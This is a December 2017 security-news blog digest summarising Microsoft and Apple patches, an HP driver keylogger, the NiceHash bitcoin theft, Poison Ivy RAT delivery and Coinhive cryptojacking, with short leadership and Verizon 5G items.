Computer News & Safety tips  – Harry Waldron MVP Rotating Header Image

Microsoft Security Updates – DECEMBER 2017

Below are key resources documenting this recent monthly Microsoft Patch Tuesday release

https://isc.sans.edu/forums/diary/December+Microsoft+Patch+Tuesday+Summary/23123/

http://blog.talosintelligence.com/2017/12/ms-tuesday.html

https://portal.msrc.microsoft.com/en-us/security-guidance/summary

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month’s advisory release addresses 34 new vulnerabilities with 21 of them rated critical and 13 of them rated important. These vulnerabilities impact Edge, Exchange, Internet Explorer, Office, Scripting Engine, Windows, and more.

Luckily, none of the vulnerabilities have been exploited in the wild of have been disclosed prior to today. The list includes the malware protection engine update that was released on Friday. Probably the most interesting vulnerability is the remote code execution in Windows RRAS. (CVE 2017-11885). According to Microsoft, this vulnerability can be exploited via RPC on servers that have routing enabled. (RRAS is the Routing and Remote Access Service). I am a bit confused why Microsoft rates this one only as “important”. Maybe because RRAS is not enabled by default.

Microsoft Defender – Two Critical vulnerabilities patched DEC-2017

The Microsoft Defender security facility was recently patched for 2 critical vulnerabilities. Details for CVE-2017-11937 and CVE-2017-11940 are noted below: 

https://www.infosecurity-magazine.com/news/microsoft-patches-two-critical/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11940

Microsoft has released fixes for two critical flaws in its Windows Defender product which could allow attackers to completely take control of a targeted system.  CVE-2017-11937 and CVE-2017-11940 are remote code execution (RCE) vulnerabilities that exist when the Microsoft Malware Protection Engine (MMPE) doesn’t properly scan a specially crafted file, leading to memory corruption.

A remote attacker could therefore use a specially crafted file to execute arbitrary code, leading to a full system compromise. The file could be emailed, IM’d or delivered via a compromised website, the alert noted.  As the engine automatically scans files in real-time, the bugs could be easily exploited.

Malware – ZwClose Keylogger patched on some new HP laptops

A hidden and inactive keylogger is being patched on some new HP laptops as described below:

http://www.zdnet.com/article/keylogger-uncovered-on-hundreds-of-hp-pcs/

Hewlett Packard has issued an emergency patch to resolve a driver-level keylogger discovered on hundreds of HP laptops.  The bug was discovered by Michael Myng, also known as “ZwClose.” The security researcher was exploring the Synaptics Touchpad SynTP.sys keyboard driver and how laptop keyboards were backlit and stumbled across code which looked suspiciously like a keylogger.

In a blog post, ZwClose said the keylogger, which saved scan codes to a WPP trace, was found in the driver.  While logging was disabled by default, given the right permissions, it could be enabled through changing registry values and so should a laptop be compromised by malware, malicious code — including Trojans — could take advantage of the keylogging system to spy on users.

Apple – DEC 2017 critical security updates

More details for the Apple DEC 2017 critical security updates are documented in links below 

https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23107/

https://support.apple.com/en-us/HT201222

After a rushed release of iOS 11.2 over the weekend to fix a “December 2nd Crash” bug, and last weeks special update to fix the passwordless root authentication bypass in macOS, Apple today released its official set of security updates. With this, we also received details about the security issues patched in iOS this weekend. Apple’s different operating systems share a lot of code with each other, and as a result, they also share some vulnerabilities. I am trying to organize the details in a table below (starting with macOS. Others will be added soon)

Security Breach – BITCOIN exchange NICEHASH compromised

Below is early report for a security compromise & an investigation is in process with authorities

http://www.eweek.com/cloud/bitcoin-exchange-nicehash-hacked-as-cryptocurrency-hits-new-highs

Though NiceHash has not publicly disclosed the number of lost Bitcoins, according to a Reuters report, 4,700 Bitcoins (BTC) were stolen from NiceHash. The value of Bitcoin has surged dramatically on Dec 7. with prices ranging from $15,000 to a high of $20,000 as of 1:30 PM ET, putting the value of the theft in the range of $70.5 to $94 million.

Malware – Poison Ivy RAT new delivery techniques DEC-2017

RAT = Remote Administration Toolkit attacks

Poison Ivy RAT has been revamped & it is using new evasion and distribution techniques. Tech Target security expert Nick Lewis explains the new attack methods that enterprises should look out for.

http://searchsecurity.techtarget.com/answer/Poison-Ivy-RAT-What-new-delivery-techniques-are-attackers-using

FireEye researchers found a Poison Ivy RAT campaign using new social engineering, evasion and distribution techniques to spread the malware, which is capable of key logging, password theft, and taking screen and video captures. What new attack and delivery methods should enterprises should be on the lookout for with this remote access Trojan?

FireEye researchers wrote about an attack using the Poison Ivy RAT, where a phishing email is used to get the victim to open a malicious Word document and execute a macro.  The emails were targeted at individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a state law proposal.

The macro used a PowerShell script that downloads malware from the internet, along with decoy documents to divert the victim’s attention. The script writes its data to the registry, taking advantage of a vulnerability in AppLocker by using regsvr32.exe to install fileless malware on the endpoint.

Leadership – Leaders can better prepare for 2018 through Reflective thinking

John Maxwell shares an excellent article on how to value of reflective thinking in a lessons learned fashion for 2017. Reflecting back on both good & bad experiences can improve results in 2018

http://johnmaxwellcompany.com/blog/how-looking-back-leaders-prepare-for-the-future

In today’s fast-paced and highly competitive corporate environment, it’s never been more important for your leaders to push pause and reflect on what happened last year in order to best plan for the year ahead. Reflective thinking can help leaders prepare for the future & thrive in the following five ways:

1. Gives True Perspective — What were their successes? What did they learn? It’s important to reflect on experiences because human beings have the tendency to take things for granted.

2. Gives Emotional Integrity — Reflective thinking enables leaders to distance themselves from the intense emotions of particularly good or bad experiences and stop carrying around emotional baggage.

3. Gives Confidence in Decision-Making — Every leader must make snap judgments from time to time—and later wonder if he or she did the right thing. Reflective thinking can help to diffuse that doubt.

4. Helps Keep the Big Picture in Mind — Reflective thinking puts ideas and experiences into a more accurate context. It encourages leaders to ponder what had been done and observed.

5. Takes a Good Experience and Makes It a Great Experience — It’s not necessarily experience that is valuable; it’s the insight leaders gain because of the experience. Reflective thinking turns experience into insight. An experience becomes valuable when it informs or equips leaders to meet new experiences.

MacOS 10.13.1 – Root vulnerability critical security patch released

Apple has just released an emergency patch to better lock down the “root” account where a preset password does not exist.  In certain settings, the “MacOS 10.13.1 Root vulnerability” allowed a missing password challenge to be fully worked around.  This bug is serious and Apple quickly responded with a “patch now” update  

https://redmondmag.com/articles/2017/11/29/apple-issuing-macos-high-sierra-patch.aspx

Apple is issuing a patch today for macOS High Sierra users that fixes a major password-bypass flaw in that operating system. The flaw lets anyone access a system with superuser privileges by using the user name “root” and a blank password. Apple is releasing Security Update 2017-001, which is designed to fix a logic error in the credentials validation process, according to a Nov. 29 Apple support article. The fix is only for macOS High Sierra 10.13.1 users. Older macOS High Sierra versions aren’t affected, according to Apple.

More can be found here:

https://blogs.msmvps.com/harrywaldron/2017/11/29/macos-10-13-1-root-vulnerability-allows-new-admin-account-without-password/

Verizon 5G Wireless – 2018 implementation planned for Sacramento

Widespread implementation of the high-speed 5G standard is still a few years ago. Verizon will start making commercial service available in a few regional areas in 2018 as standards like the new 5G radio specifications are finalized. Sacramento has been designated as one target city for this new high-speed wireless standard.  

Verizon commercializing 5G fixed wireless access in 2018

Throughout this year, Verizon has tested 5G fixed wireless access in 11 U.S. markets, which the company said included “several hundred cell sites that cover several thousand customer locations. Now Verizon says it will use that technology to deliver residential broadband services in three to five markets next year.

The carrier will make the commercial service available first in Sacramento, Calif., during the second half of 2018. Given the timing, Verizon’s commercial launch should follow the 3GPP’s release of the 5G New Radio specification, which is tracking for June 2018. Operators in the U.S. and around the world have looked to 5G fixed wireless access as a way to deliver multi-gigabit-per-second throughput speeds without needing to deploy fiber directly to homes and premises, which is a costly and time-consuming process.

Malware – Coinhive cryptocurrency miner steals visitors CPU power on infected websites

The Coinhive cryptocurrency mining facility is being misused as a new hacking tool.  Cybercriminals can secretly imbed this on vulnerable websites with weak security controls & mine digital currencies for themselves. There is no notification to visitors that any mining is taking place.

https://www.pcmag.com/news/357535/why-hackers-love-cryptocurrency-miner-coinhive

A brilliant idea to monetize internet traffic appears to be running amok.  You may have encountered it. Computer code that has found its way into tens of thousands of websites secretly siphons CPU processing power to mine a digital currency called Monero.

The code’s developer, Coinhive, rakes in the dough, but some security researchers claim it’s a form of malware, and say the code is lining the pockets of hackers, too. “It’s becoming a new revenue stream for cybercriminals,” said Troy Mursch, an independent security researcher.

Coinhive first released its cryptocurrency miner in September as a novel way for websites to generate revenue. Once embedded into a website, the code mines the digital currency Monero by borrowing visitors’ CPU processing power. The more visitors, the more money earned. Site owners take a 70 percent share, while Coinhive grabs the rest.

That may sound great, but there’s one big problem: the Coinhive code often doesn’t tell website visitors that any mining is taking place. It can simply borrow CPU processing power via the browser, without any warning.  Mursch found the crypto miner in over 30,000 random sites, many of which don’t appear to be using the Coinhive code deliberately. Among them was PolitiFact, a fact-checking service which briefly hosted the Coinhive code in October because its site was hacked.